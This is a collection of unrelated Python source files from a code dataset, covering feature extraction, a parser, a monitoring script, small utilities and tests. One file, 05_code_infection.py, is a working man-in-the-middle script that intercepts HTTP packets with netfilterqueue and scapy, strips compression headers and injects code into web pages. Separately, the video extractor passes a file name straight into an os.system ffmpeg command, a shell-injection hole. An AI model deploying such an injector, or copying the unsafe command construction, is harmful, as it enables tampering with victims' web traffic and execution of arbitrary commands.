print('保存文本特征为{}'.format(txt_file_path))\r\n if 'image' in feat_dict and filetype == 'mp4':\r\n cv2.imwrite(image_jpg_path, feat_dict['image'][:, :, ::-1])\r\n return feat_dict\r\n\r\n def extract_image_feat(self, test_file):\r\n feat_dict = {}\r\n feat_dict['image'] = cv2.imread(test_file, 1)[:, :, ::-1] # convert to rgb\r\n\r\n if self.extract_text:\r\n start_time = time.time()\r\n image_ocr = 
 def extract_image_feat(self, test_file):\r\n feat_dict = {}\r\n feat_dict['image'] = cv2.imread(test_file, 1)[:, :, ::-1] # convert to rgb\r\n\r\n if self.extract_text:\r\n start_time = time.time()\r\n image_ocr = self.image_ocr_extractor.request(test_file)\r\n feat_dict['text'] = json.dumps({'image_ocr': image_ocr}, ensure_ascii=False)\r\n end_time = time.time()\r\n print(\"text extract cost {} sec\".format(end_time - start_time))\r\n return feat_dict\r\n\r\n def extract_video_feat(self, test_file,\r\n frame_npy_path=None, audio_npy_path=None, txt_file_path=None,\r\n image_jpg_path=None, save=True):\r\n feat_dict = {}\r\n # ============================================= video\r\n if (frame_npy_path is None or os.path.exists(frame_npy_path)) and save:\r\n pass\r\n else:\r\n start_time = time.time()\r\n if self.batch_size == 1:\r\n features_arr = []\r\n for rgb in self.frame_iterator(test_file, every_ms=1000.0 / FRAMES_PER_SECOND):\r\n rgb = self.data_argument(rgb)\r\n features = self.extractor.extract_rgb_frame_features(rgb[:, :, ::-1])\r\n features_arr.append(features)\r\n feat_dict['video'] = features_arr\r\n else:\r\n rgb_list = self.frame_iterator_list(test_file, every_ms=1000.0 / FRAMES_PER_SECOND)\r\n feat_dict['video'] = self.extractor.extract_rgb_frame_features_list(rgb_list, self.batch_size)\r\n end_time = time.time()\r\n print(\"video extract cost {} sec\".format(end_time - start_time))\r\n # ============================================= middle-frame image\r\n if (image_jpg_path is None or os.path.exists(image_jpg_path)) and save:\r\n pass\r\n else:\r\n start_time = time.time()\r\n rgb_list = self.frame_iterator_list(test_file, every_ms=1000.0 / FRAMES_PER_SECOND)\r\n feat_dict['image'] = rgb_list[len(rgb_list) // 2]\r\n end_time = time.time()\r\n print(\"image extract cost {} sec\".format(end_time - start_time))\r\n # ============================================= audio\r\n if (audio_npy_path is None or os.path.exists(audio_npy_path)) and save:\r\n # postprocessed_batch = np.load(audio_npy_path)\r\n pass\r\n else:\r\n start_time = time.time()\r\n output_audio = test_file.replace('.mp4', '.wav') # NOTE: assumes an .mp4 input name\r\n if not os.path.exists(output_audio):\r\n command = 'ffmpeg -loglevel error -i ' + test_file + ' ' + output_audio\r\n os.system(command)\r\n # print(\"audio file not exists: {}\".format(output_audio))\r\n # return\r\n examples_batch = vggish_input.wavfile_to_examples(output_audio)\r\n [embedding_batch] = self.audio_sess.run([self.embedding_tensor],\r\n feed_dict={self.features_tensor: examples_batch})\r\n feat_dict['audio'] = self.pproc.postprocess(embedding_batch)\r\n end_time = time.time()\r\n print(\"audio extract cost {} sec\".format(end_time - start_time))\r\n # ============================================= text\r\n if (txt_file_path is None or os.path.exists(txt_file_path)) and save:\r\n pass\r\n elif self.extract_text:\r\n start_time = time.time()\r\n video_ocr = self.video_ocr_extractor.request(test_file)\r\n video_asr = self.video_asr_extractor.request(test_file)\r\n feat_dict['text'] = json.dumps({'video_ocr': video_ocr, 'video_asr': video_asr}, ensure_ascii=False)\r\n print(feat_dict['text'])\r\n end_time = time.time()\r\n print(\"text extract cost {} sec\".format(end_time - start_time))\r\n return feat_dict\r\n\r\n
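 # A safer alternative to the os.system() ffmpeg call above is the subprocess\r\n # module (illustrative sketch, not part of the original pipeline):\r\n #\r\n # import subprocess\r\n # subprocess.run(['ffmpeg', '-loglevel', 'error', '-i', test_file, output_audio], check=True)\r\n #\r\n # Passing an argument list avoids shell quoting issues when test_file contains spaces.\r\n\r\n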
 def data_argument(self, rgb_frame):\r\n if not self.data_aug:\r\n return rgb_frame\r\n from imgaug import augmenters as iaa\r\n\r\n seq = iaa.Sequential([\r\n iaa.CropAndPad(\r\n px=(0, 30)), # crop/pad each side by 0 to 30px (randomly chosen)\r\n iaa.Fliplr(1), # horizontally flip every image (p=1)\r\n iaa.Flipud(1), # vertically flip every image (p=1)\r\n iaa.GaussianBlur(sigma=(0, 3.0)), # blur images with a sigma of 0 to 3.0\r\n # # iaa.Affine(\r\n # # scale={\"x\": (0.8, 1.2), \"y\": (0.8, 1.2)}, # scale images to 80-120% of their size, individually per axis\r\n # # translate_percent={\"x\": (-0.2, 0.2), \"y\": (-0.2, 0.2)}, # translate by -20 to +20 percent (per axis)\r\n # # rotate=(-45, 45), # rotate by -45 to +45 degrees\r\n # # shear=(-16, 16), # shear by -16 to +16 degrees\r\n # # order=[0, 1], # use nearest neighbour or bilinear interpolation (fast)\r\n # # cval=(0, 255), # if mode is constant, use a cval between 0 and 255\r\n # # mode=ia.ALL # use any of scikit-image's warping modes (see 2nd image from the top for examples)\r\n # # ),\r\n iaa.Invert(0.05, per_channel=True),\r\n iaa.ContrastNormalization((0.5, 2.0), per_channel=0.5),\r\n iaa.AddToHueAndSaturation((-20, 20)), # commonly raises errors\r\n iaa.Add((-10, 10), per_channel=0.5),\r\n iaa.Sharpen(alpha=(0, 1.0), lightness=(0.75, 1.5)),\r\n iaa.Emboss(alpha=(0, 1.0), strength=(0, 2.0)), # emboss images\r\n iaa.Rot90(1),\r\n iaa.ElasticTransformation(alpha=(0.5, 3.5), sigma=0.25),\r\n iaa.Rot90(2),\r\n iaa.Rot90(3),\r\n ])\r\n rgb_frame = seq.augment_image(rgb_frame)\r\n return rgb_frame\r\n\r\n\r\ndef run_test_extract():\r\n model = MultiModalFeatureExtract(batch_size=2,\r\n imgfeat_extractor='vit',\r\n extract_video=True,\r\n extract_audio=False,\r\n extract_text=False)\r\n model.extract_feat(\r\n test_file=\"/Users/zhiqianhe/MyProjects/腾讯广告算法/txad/MultiModal-Tagging/src/feats_extract/imgfeat_extractor/90bf818ccdf36b3423f3c9193aa689c4.mp4\",\r\n frame_npy_path='./test.npy'\r\n )\r\n print(np.load('./test.npy'))\r\n # print(res['video'][0].shape)\r\n # print(len(res['video']))\r\n # img_file = \"/Users/zhiqianhe/MyProjects/腾讯广告算法/txad/MultiModal-Tagging/src/feats_extract/imgfeat_extractor/beautiful_girl.jpg\"\r\n # img = cv2.imread(img_file)\r\n\r\n # img = model.data_argument(img)\r\n # cv2.imshow('bg', img)\r\n # cv2.waitKey(0)\r\n # cv2.destroyAllWindows()\r\n\r\n\r\nif __name__ == '__main__':\r\n run_test_extract()\r\n","sub_path":"src/feats_extract/multimodal_feature_extract.py","file_name":"multimodal_feature_extract.py","file_ext":"py","file_size_in_byte":13638,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"53083283","text":"\nx = int(input(\"Please input a number and I will return a list of all the divisors of that number \\n\"))\n\nprint(\"You chose \" + str(x))\n\n#if(x % 2 ==0):\n #print(\"Divisible by 2\")\n \nrangeofnumbers = range(2, x+1)\nfor y in rangeofnumbers:\n if (x % y == 0):\n print(str(y) + \" is a divisor of \" + str(x))\n else:\n print(str(y) + \" is not a divisor of \" + str(x))\n","sub_path":"codingchallenges/divisors.py","file_name":"divisors.py","file_ext":"py","file_size_in_byte":382,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"341360615","text":"from zipfile import ZipFile\nimport os\n\n\ndef get_file_paths(source):\n # walk through the directory tree, including subdirectories\n file_paths = []\n file_paths1 = [os.path.join(root, filename) for root, direc, files in os.walk(source) for filename in files]\n\n for root, direc, files in os.walk(source):\n for filename in files:\n # join the two parts to form the full path to the file.\n filepath = os.path.join(root, filename)\n file_paths.append(filepath)\n # return all file paths\n print(f'file_paths = {type(file_paths)}')\n print(f'file_paths1 = {file_paths1}')\n return file_paths1\n\n\n
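# Example (illustrative): for a tree holding a.txt and sub/b.txt,\n# get_file_paths('/tmp/demo') returns ['/tmp/demo/a.txt', '/tmp/demo/sub/b.txt'];\n# the explicit loop and the file_paths1 comprehension build the same list.\n\n\n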
def make_reserve_arc(source, dest):\n file_name = \"archive.zip\"\n\n file_paths = get_file_paths(source)\n\n with ZipFile(file_name, 'w') as myzip:\n for file in file_paths:\n myzip.write(file)\n # myzip.write(source)\n # print(myzip.namelist())\n\n\nsource = '/home/pnm/PycharmProjects/Yandex/d-19/Web1/files_zip'\ndest = ''\nmake_reserve_arc(source, dest)\n","sub_path":"Web1/backup.py","file_name":"backup.py","file_ext":"py","file_size_in_byte":1194,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"144322007","text":"from itertools import chain\nimport io\nimport json\n\n\n# TEXT SECTION\ndef truncline(text, font, maxwidth):\n \"\"\"Truncates the text so that it fits on fixed-width lines\"\"\"\n real = len(text)\n stext = text\n l = font.size(text)[0]\n cut = 0\n a = 0\n done = 1\n while l > maxwidth:\n a = a + 1\n n = text.rsplit(None, a)[0]\n if stext == n:\n cut += 1\n stext = n[:-cut]\n else:\n stext = n\n l = font.size(stext)[0]\n real = len(stext)\n done = 0\n return real, done, stext\n\n\ndef wrapline(text, font, maxwidth):\n \"\"\"\n Call this to break a string into several lines (without taking \\n into account)\n :param text: Text to wrap\n :param font: Font\n :param maxwidth: Line width in pixels\n :return: List of lines\n \"\"\"\n done = 0\n wrapped = []\n\n while not done:\n nl, done, stext = truncline(text, font, maxwidth)\n wrapped.append(stext.strip())\n text = text[nl:]\n return wrapped\n\n\ndef wrap_multi_line(text, font, maxwidth):\n \"\"\"\n Call this to break a string into several lines (taking \\n into account)\n :param text: Text to wrap\n :param font: Font\n :param maxwidth: Line width in pixels\n :return: List of lines\n \"\"\"\n lines = chain(*(wrapline(line, font, maxwidth) for line in text.splitlines()))\n return list(lines)\n\ndef get_cursor_pos(cursor, lines):\n x, y = 0, 0\n remaining = cursor\n for line in lines:\n for letter in line:\n if remaining > 0:\n x += 1\n remaining -= 1\n if remaining > 0:\n x = 0\n y += 1\n\n return x, y\n\n\n# SCENE SAVE/LOAD SECTION\ndef save_scene(json, file_path):\n file_scene = io.open(\"scenes/scene_\" + file_path + \".json\", 'w', encoding='utf-8')\n file_scene.write(json)\n file_scene.close()\n\n\ndef load_scene(file_path):\n file_scene = io.open(\"scenes/scene_\" + file_path + \".json\", 'r', encoding='utf-8')\n json_scene = json.load(file_scene)\n file_scene.close()\n return json_scene\n","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":2204,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"82269072","text":"#!/home/grg/jupyter/bin/python\nfrom functools import wraps\nimport errno, os\nimport signal\nimport warnings\nimport logging as log\nwarnings.filterwarnings('ignore')\nfrom bbrc.xnat.collect import *\n\nfrom datetime import datetime\nstartTime = datetime.now() # not nice but avoids passing it everywhere\n\nclass TimeoutError(Exception):\n pass\n\ndef timeout(seconds=10, error_message=os.strerror(errno.ETIME)):\n def decorator(func):\n def _handle_timeout(signum, frame):\n raise TimeoutError(error_message)\n\n def wrapper(*args, **kwargs):\n signal.signal(signal.SIGALRM, _handle_timeout)\n signal.alarm(seconds)\n try:\n result = func(*args, **kwargs)\n finally:\n signal.alarm(0)\n return result\n\n return wraps(func)(wrapper)\n\n return decorator\n\n@timeout(10, error_message='Server not responding')\ndef 
connect_xnat(config_file):\n from pyxnat import Interface\n central = Interface(config=config_file, verify=True)\n projects = central.select.projects().get()\n return central, projects\n\ndef prearchive_stats(central):\n '''Lists contents of XNAT prearchive sorted by type (ready, conflicts, etc).\n `central` is a `pyxnat.Interface`.'''\n projects = central.select.projects().get()\n pa = []\n for e in central.manage.prearchive.get():\n st = central.manage.prearchive.status(e)\n if isinstance(st, list):\n for each in st:\n pa.append((e, each))\n else:\n pa.append((e, st))\n pa_by_type = {}\n for each, t in pa:\n pa_by_type.setdefault(t, []).append(each)\n return pa, pa_by_type\n\ndef sizes_projects(central):\n '''Returns a project-indexed dictionary with numbers of subjects/sessions.\n `central` is a `pyxnat.Interface`.'''\n projects = central.select.projects().get()\n sizes = {}\n for project in projects:\n s = central.select.project(project).subjects().get()\n e = central.select.project(project).experiments().get()\n sizes[project] = (len(s), len(e))\n return sizes\n\ndef count(central, output_dir, send_mail=True, debug_mode=False):\n '''Builds a Slack-ready text report on how many studies/subjects/sessions\n are stored in the given XNAT. `central` is a `pyxnat.Interface`.'''\n import operator\n import validate as vx\n\n projects = central.select.projects().get()\n # Collecting data\n\n sizes = sizes_projects(central)\n total_subjects = sum([v[0] for k, v in sizes.items()])\n total_sessions = sum([v[1] for k, v in sizes.items()])\n\n sizes = sorted(sizes.items(), key=operator.itemgetter(1), reverse=True)\n log.warning(sizes)\n\n pa, pa_by_type = prearchive_stats(central)\n\n # Building the message\n text = 'There are currently %s studies on XNAT (BSC) '\\\n '(total number of subjects: %s - total number of sessions: %s). %s sessions'\\\n ' are found in the prearchive (%s receiving, %s ready, %s building, '\\\n '%s moving, %s archiving, %s archiving pending, %s in conflict, %s with errors)'\\\n %(len(sizes), total_subjects, total_sessions, len(pa),\n len(pa_by_type.get('RECEIVING', [])), len(pa_by_type.get('READY', [])),\n len(pa_by_type.get('_BUILDING', [])), len(pa_by_type.get('_MOVING', [])),\n len(pa_by_type.get('_ARCHIVING', [])), len(pa_by_type.get('ARCHIVING', [])),\n len(pa_by_type.get('CONFLICT', [])), len(pa_by_type.get('ERROR', [])))\n attachment = ''\n for each in sizes:\n attachment = attachment + '*%s*: _%s subjects - %s sessions_\\n'\\\n %(each[0], each[1][0], each[1][1])\n\n return text, attachment\n\n\ndef notify_slack(text, attachment, webhook_url, debug_mode=False):\n\n def md5(fname):\n import hashlib\n hash_md5 = hashlib.md5()\n with open(fname, \"rb\") as f:\n for chunk in iter(lambda: f.read(4096), b\"\"):\n hash_md5.update(chunk)\n return hash_md5.hexdigest()\n\n import json, os\n\n #===============================================================================\n # Estimates elapsed time\n seconds = datetime.now() - startTime\n m, s = divmod(seconds.total_seconds(), 60)\n h, m = divmod(m, 60)\n elapsedtime = \"%d:%02d:%02d\" % (h, m, s)\n\n #====================\n # Sends the report to Slack\n\n payload = {\"text\": \"%s Elapsed time: %s. 
(xnat-bsc-monitor v.%s)\"\\\n %(text, elapsedtime, md5(__file__)[:8]),\n \"attachments\": [{\n 'fallback': 'XNAT stats',\n \"text\": attachment,\n \"mrkdwn_in\": [\"text\", \"pretext\"]\n }],\n \"link_names\": 1,\n \"username\": \"xnat-monitor\",\n \"icon_emoji\": \":computer:\"\n }\n\n if not debug_mode:\n payload.update({'channel': '#xnat'})\n else:\n payload.update({'channel': '@goperto'})\n\n payload = json.dumps(payload).replace('\"', '\\\\\"').replace('\\n', '\\\\n')\n\n cmd = 'curl -H \"Content-Type: application/json\" --data \"%s\" %s'\\\n %(payload, webhook_url)\n log.info(cmd)\n\n os.system(cmd)\n","sub_path":"bbrc/xnat/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":5130,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"379213773","text":"import sys\nimport logging\nimport spacy\nfrom graphbrain import *\nfrom graphbrain.meaning.nlpvis import print_tree\n\n\nlogging.basicConfig(stream=sys.stderr, level=logging.ERROR)\n\n\ndeps_arg_types = {\n 'nsubj': 's', # subject\n 'nsubjpass': 'p', # passive subject\n 'agent': 'a', # agent\n 'acomp': 'c', # subject complement\n 'attr': 'c', # subject complement\n 'dobj': 'o', # direct object\n 'prt': 'o', # direct object\n 'dative': 'i', # indirect object\n 'advcl': 'x', # specifier\n 'prep': 'x', # specifier\n 'parataxis': 't', # parataxis\n 'intj': 'j', # interjection\n 'xcomp': 'r', # clausal complement\n 'ccomp': 'r' # clausal complement\n}\n\n\ndef token_head_type(token):\n head = token.head\n if head and head != token:\n return token_type(head)\n else:\n return ''\n\n\ndef is_noun(token):\n return token.tag_[:2] == 'NN'\n\n\n# TODO: check if complete\ndef is_verb(token):\n tag = token.tag_\n if len(tag) > 0:\n return token.tag_[0] == 'V'\n else:\n return False\n\n\ndef is_compound(token):\n return token.dep_ == 'compound'\n\n\ndef token_type(token):\n dep = token.dep_\n head_type = token_head_type(token)\n if len(head_type) > 1:\n head_subtype = head_type[1]\n else:\n head_subtype = ''\n if len(head_type) > 0:\n head_type = head_type[0]\n\n if dep == 'ROOT':\n if token.pos_ == 'VERB': # TODO: generalize!\n return 'p'\n else:\n return 'c'\n elif dep in {'acomp', 'appos', 'attr', 'compound', 'dative', 'dep',\n 'dobj', 'nsubj', 'nsubjpass', 'oprd', 'pobj', 'meta'}:\n return 'c'\n elif dep in {'advcl', 'ccomp', 'csubj', 'csubjpass', 'parataxis'}:\n return 'p'\n elif dep == 'relcl':\n if is_verb(token):\n return 'pr'\n else:\n return 'c'\n elif dep in {'acl', 'pcomp', 'xcomp'}:\n if token.tag_ == 'IN':\n return 'a'\n else:\n return 'pc'\n elif dep in {'amod', 'det', 'npadvmod', 'nummod', 'nmod', 'preconj',\n 'predet'}:\n return 'm'\n elif dep in {'aux', 'auxpass', 'expl', 'prt', 'quantmod'}:\n if token.n_lefts + token.n_rights == 0:\n return 'a'\n else:\n return 'x'\n elif dep == 'cc':\n if head_type == 'p':\n return 'pm'\n else:\n return 'b'\n elif dep == 'case':\n if token.head.dep_ == 'poss':\n return 'bp'\n else:\n return 'b'\n elif dep == 'neg':\n return 'an'\n elif dep == 'agent':\n return 'x'\n elif dep in {'intj', 'punct'}:\n return ''\n elif dep == 'advmod':\n if token.head.dep_ == 'advcl':\n return 't'\n elif head_type == 'p':\n return 'a'\n elif head_type in {'m', 'x', 't'}:\n return 'w'\n else:\n return 'm'\n elif dep == 'poss':\n if is_noun(token):\n return 'c'\n else:\n return 'mp'\n elif dep == 'prep':\n if head_type == 'p':\n return 't'\n else:\n return 'b'\n elif dep == 'conj':\n if head_type == 'p' and is_verb(token):\n return 'p'\n else:\n 
return 'c'\n elif dep == 'mark':\n if head_type == 'p' and head_subtype != 'c':\n return 'x'\n else:\n return 'b'\n else:\n # error / warning\n pass\n\n\ndef is_relative_concept(token):\n return token.dep_ == 'appos'\n\n\ndef arg_type(token):\n return deps_arg_types.get(token.dep_, '?')\n\n\ndef insert_after_predicate(targ, orig):\n targ_type = entity_type(targ)\n if targ_type[0] == 'p':\n return (targ, orig)\n elif targ_type[0] == 'r':\n if targ_type == 'rm':\n inner_rel = insert_after_predicate(targ[1], orig)\n return (targ[0], inner_rel) + tuple(targ[2:])\n else:\n return insert_first_argument(targ, orig)\n else:\n # TODO: error / warning\n print('ERROR %s %s' % (targ, orig))\n return targ\n\n\ndef nest_predicate(inner, outer, before):\n if entity_type(inner) == 'rm':\n first_rel = nest_predicate(inner[1], outer, before)\n return (inner[0], first_rel) + tuple(inner[2:])\n elif is_atom(inner) or entity_type(inner)[0] == 'p':\n return outer, inner\n else:\n return ((outer, inner[0]),) + inner[1:]\n\n\ndef post_process(entity):\n if is_atom(entity):\n return entity\n else:\n entity = tuple(post_process(item) for item in entity)\n if connector_type(entity)[0] == 'c':\n return connect('+/b/.', entity)\n else:\n return entity\n\n\nclass Parser(object):\n def __init__(self, lang, pos=False):\n self.lang = lang\n self.pos = pos\n\n if lang == 'en':\n self.nlp = spacy.load('en_core_web_lg')\n elif lang == 'fr':\n self.nlp = spacy.load('fr_core_news_md')\n else:\n raise RuntimeError('unkown language: %s' % lang)\n\n def parse_token(self, token):\n extra_edges = set()\n\n positions = {}\n tokens = {}\n children = []\n entities = []\n\n child_tokens = tuple((t, True) for t in token.lefts)\n child_tokens += tuple((t, False) for t in token.rights)\n\n for child_token, pos in child_tokens:\n child, child_extra_edges = self.parse_token(child_token)\n if child:\n extra_edges |= child_extra_edges\n positions[child] = pos\n tokens[child] = child_token\n child_type = entity_type(child)\n if child_type:\n children.append(child)\n if child_type[0] in {'c', 'r', 'd', 's'}:\n entities.append(child)\n\n children.reverse()\n\n parent_type = token_type(token)\n if parent_type == '' or parent_type is None:\n return None, None\n\n # build atom\n text = token.text.lower()\n et = parent_type\n if self.pos:\n pos = '{}.{}'.format(self.lang, token.tag_.lower())\n else:\n pos = None\n\n if parent_type[0] == 'p' and parent_type != 'pm':\n if len(parent_type) == 1:\n parent_type = 'pd' # TODO: questions, imperative...\n args = [arg_type(tokens[entity]) for entity in entities]\n args_string = ''.join([arg for arg in args if arg != '?'])\n et = '{}.{}'.format(parent_type, args_string)\n\n parent_atom = build_atom(text, et, pos)\n\n parent = parent_atom\n\n relative_to_concept = []\n\n # process children\n for child in children:\n child_type = entity_type(child)\n\n logging.debug('TARGET <-: [%s] %s', parent_type, parent)\n logging.debug('<- ORIG: [%s] %s', child_type, child)\n\n if child_type[0] in {'c', 'r', 'd', 's'}:\n if parent_type[0] == 'c':\n if (connector_type(child) in {'pc', 'pr'} or\n is_relative_concept(tokens[child])):\n logging.debug('CHOICE #1')\n relative_to_concept.append(child)\n elif connector_type(child)[0] == 'b':\n if connector_type(parent)[0] == 'c':\n logging.debug('CHOICE #2')\n parent = nest(parent, child, positions[child])\n else:\n logging.debug('CHOICE #3')\n parent = apply_fun_to_atom(\n lambda target:\n nest(target, child, positions[child]),\n parent_atom, parent)\n elif 
connector_type(child)[0] in {'x', 't'}:\n logging.debug('CHOICE #4')\n parent = nest(parent, child, positions[child])\n else:\n if ((entity_type(parent_atom)[0] == 'c' and\n connector_type(child)[0] == 'c') or\n is_compound(tokens[child])):\n if connector_type(parent)[0] == 'c':\n if connector_type(child)[0] == 'c':\n logging.debug('CHOICE #5a')\n parent = sequence(parent, child,\n positions[child])\n else:\n logging.debug('CHOICE #5b')\n parent = sequence(parent, child,\n positions[child],\n flat=False)\n else:\n logging.debug('CHOICE #6')\n parent = apply_fun_to_atom(\n lambda target:\n sequence(target, child,\n positions[child]),\n parent_atom, parent)\n else:\n logging.debug('CHOICE #7')\n parent = apply_fun_to_atom(\n lambda target:\n connect(target, (child,)),\n parent_atom, parent)\n elif parent_type[0] in {'p', 'r', 'd', 's'}:\n logging.debug('CHOICE #8')\n parent = insert_after_predicate(parent, child)\n else:\n logging.debug('CHOICE #9')\n parent = insert_first_argument(parent, child)\n elif child_type[0] == 'b':\n if connector_type(parent) == 'c':\n logging.debug('CHOICE #10')\n parent = connect(child, parent)\n else:\n logging.debug('CHOICE #11')\n parent = nest(parent, child, positions[child])\n elif child_type[0] == 'p':\n # TODO: Pathological case\n # e.g. \"Some subspecies of mosquito might be 1s...\"\n if child_type == 'pm':\n logging.debug('CHOICE #12')\n # parent = nest(parent, child, positions[child])\n parent = (child,) + parens(parent)\n else:\n logging.debug('CHOICE #13')\n parent = connect(parent, (child,))\n elif child_type[0] == 'm':\n logging.debug('CHOICE #14')\n parent = (child, parent)\n elif child_type[0] in {'x', 't'}:\n logging.debug('CHOICE #15')\n parent = (child, parent)\n elif child_type[0] == 'a':\n logging.debug('CHOICE #16')\n parent = nest_predicate(parent, child, positions[child])\n elif child_type == 'w':\n if parent_type[0] in {'d', 's'}:\n logging.debug('CHOICE #17')\n parent = nest_predicate(parent, child, positions[child])\n # pass\n else:\n logging.debug('CHOICE #18')\n parent = nest(parent, child, positions[child])\n else:\n # TODO: warning ?\n logging.debug('CHOICE #19')\n pass\n\n parent_type = entity_type(parent)\n\n logging.debug('=== [%s] %s', parent_type, parent)\n\n if len(relative_to_concept) > 0:\n relative_to_concept.reverse()\n parent = (':/b/.', parent) + tuple(relative_to_concept)\n\n return post_process(parent), extra_edges\n\n def parse_sentence(self, sent):\n main_edge, extra_edges = self.parse_token(sent.root)\n return {'main_edge': main_edge,\n 'extra_edges': extra_edges,\n 'text': str(sent),\n 'spacy_sentence': sent}\n\n def parse(self, text):\n doc = self.nlp(text)\n return tuple(self.parse_sentence(sent) for sent in doc.sents)\n\n\nif __name__ == '__main__':\n text = \"\"\"\n Satellites from NASA and other agencies have been tracking sea ice changes\n since 1979.\n \"\"\"\n\n parser = Parser(lang='en', pos=True)\n parse = parser.parse(text)[0]\n print_tree(parse['spacy_sentence'].root)\n print(ent2str(parse['main_edge']))\n","sub_path":"graphbrain/meaning/parser.py","file_name":"parser.py","file_ext":"py","file_size_in_byte":12618,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"417530717","text":"# Copyright (C) 2020 by Landmark Acoustics LLC\nr'''Carry out the simulations and print the results.'''\n\nimport numpy as np\n\nfrom pypowerlawnoise import \\\n SpectralSlopeFinder, \\\n PowerLawNoise\n\n\ndef _print_heading(handle, headings, sep=',', le='\\n'):\n 
handle.write(sep.join(headings)+le)\r\n\r\n\r\nif __name__ == '__main__':\r\n\r\n    alphas = np.linspace(-2, 2, 401)\r\n    degrees = np.arange(65)\r\n    fft_sizes = 2**np.arange(6, 13)\r\n    slope_finders = {fft_size: SpectralSlopeFinder(fft_size) for fft_size in fft_sizes}\r\n    repeats = 8\r\n    rg = np.random.default_rng(42)\r\n\r\n    with open('power_law_output.csv', 'w') as fh:\r\n        _print_heading(fh, ['Power', 'Size', 'Degree', 'Slope'])\r\n        for alpha in alphas:\r\n            law = PowerLawNoise(alpha, degrees[-1])\r\n            for K in degrees:\r\n                for N in fft_sizes:\r\n                    ssf = slope_finders[N]\r\n                    for it in range(repeats):\r\n                        x = rg.standard_normal(N)\r\n                        n = law(x, K)\r\n                        m = ssf(n)\r\n                        fh.write(f'{alpha},{N},{K},{m}\\n')\r\n","sub_path":"pypowerlawnoise/pypowerlawnoise/demo.py","file_name":"demo.py","file_ext":"py","file_size_in_byte":1101,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"478228675","text":"# BSD 3-Clause License; see https://github.com/scikit-hep/awkward-1.0/blob/main/LICENSE\n\nimport pytest  # noqa: F401\nimport numpy as np  # noqa: F401\nimport awkward as ak  # noqa: F401\n\npytestmark = pytest.mark.skip(\n    reason=\"Top-down JAX tests disabled; to be replaced by bottom-up.\"\n)\n\njax = pytest.importorskip(\"jax\")\njax.config.update(\"jax_platform_name\", \"cpu\")\njax.config.update(\"jax_enable_x64\", True)\n\n\ndef test_from_jax():\n    jax_array_1d = jax.numpy.arange(10)\n    jax_array_2d = jax.numpy.array([[1.1, 2.2], [3.3, 4.4], [5.5, 6.6], [7.7, 8.8]])\n\n    ak_jax_array_1d = ak.from_jax(jax_array_1d)\n    ak_jax_array_2d = ak.from_jax(jax_array_2d)\n\n    for i in range(10):\n        assert ak_jax_array_1d[i] == jax_array_1d[i]\n\n    for i in range(4):\n        for j in range(2):\n            assert ak_jax_array_2d[i][j] == jax_array_2d[i][j]\n\n\ndef test_from_jax_tolist():\n    jax_array_1d = jax.numpy.array([9, 8, 7, 6, 5, 4, 3, 2, 1, 0])\n\n    ak_jax_array_1d = ak.from_jax(jax_array_1d)\n\n    assert ak.to_list(ak_jax_array_1d.layout) == [9, 8, 7, 6, 5, 4, 3, 2, 1, 0]\n","sub_path":"tests/test_0645-from-jax.py","file_name":"test_0645-from-jax.py","file_ext":"py","file_size_in_byte":1076,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
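A minimal round-trip sketch in the same spirit as the tests above (illustrative only; it relies on the ak.from_jax and ak.to_list calls already exercised in that file):

def test_from_jax_roundtrip():
    jax_array = jax.numpy.arange(5)
    ak_array = ak.from_jax(jax_array)
    assert ak.to_list(ak_array) == [0, 1, 2, 3, 4]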
 +{"seq_id":"420220067","text":"#!/usr/bin/env python\nimport netfilterqueue\nimport scapy.all as scapy\nimport re\n\n\ndef set_load(packet, load):\n packet[scapy.Raw].load = load\n del packet[scapy.IP].len\n del packet[scapy.IP].chksum\n del packet[scapy.TCP].chksum\n return packet\n\ndef process_packet(packet):\n scapy_packet = scapy.IP(packet.get_payload())\n print(\"1\")\n if scapy_packet.haslayer(scapy.Raw):\n load = scapy_packet[scapy.Raw].load\n if scapy_packet[scapy.TCP].dport == 80:\n load = re.sub(\"Accept-Encoding:.*?\\\\r\\\\n\", \"\", load)\n\n elif scapy_packet[scapy.TCP].sport == 80:\n # NOTE: the injected markup was stripped from this dataset dump; the\n # <script> payload and </body> target below are plausible placeholders.\n injection_code = \"<script>alert('injected');</script>\"\n load = load.replace(\"</body>\", injection_code + \"</body>\")\n content_length_search = re.search(\"(?:Content-Length:\\s)(\\d*)\", load)\n if content_length_search and \"text/html\" in load:\n content_length = content_length_search.group(1)\n new_content_length = int(content_length) + len(injection_code)\n load = load.replace(content_length, str(new_content_length))\n print(\"---------\")\n print(content_length)\n print(new_content_length)\n if load != scapy_packet[scapy.Raw].load:\n new_packet = set_load(scapy_packet, load)\n packet.set_payload(str(new_packet))\n\n packet.accept()\n\ntry:\n queue = netfilterqueue.NetfilterQueue()\n queue.bind(0, process_packet)\n queue.run()\n\nexcept KeyboardInterrupt:\n print(\"[+] Detected CTRL + C ..... Unbinding queue...... Please wait.\\n\")\n queue.unbind()\n","sub_path":"05_code_infection.py","file_name":"05_code_infection.py","file_ext":"py","file_size_in_byte":1607,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"365311780","text":"from selenium import webdriver\nfrom selenium.webdriver.common.keys import Keys\nfrom selenium.webdriver.support.select import Select\nimport sys,os,re\nfrom datetime import date\nfrom bs4 import BeautifulSoup\nsys.path.append(os.path.dirname(os.path.dirname(os.path.abspath(__file__))))\nfrom HTML import getDept\nfrom parsing import progress\n\n# updateDepartments(term,depts=getDept.gatherFields().dept)\n# term = YYYYTT i.e. 2017SU - string\n# depts = dictionary of department codes : department - both are strings (optional)\n# skips = $SKIPLIST - path to skip list (optional)\n# returns boolean - true for success\n# in folder courselists, there is a 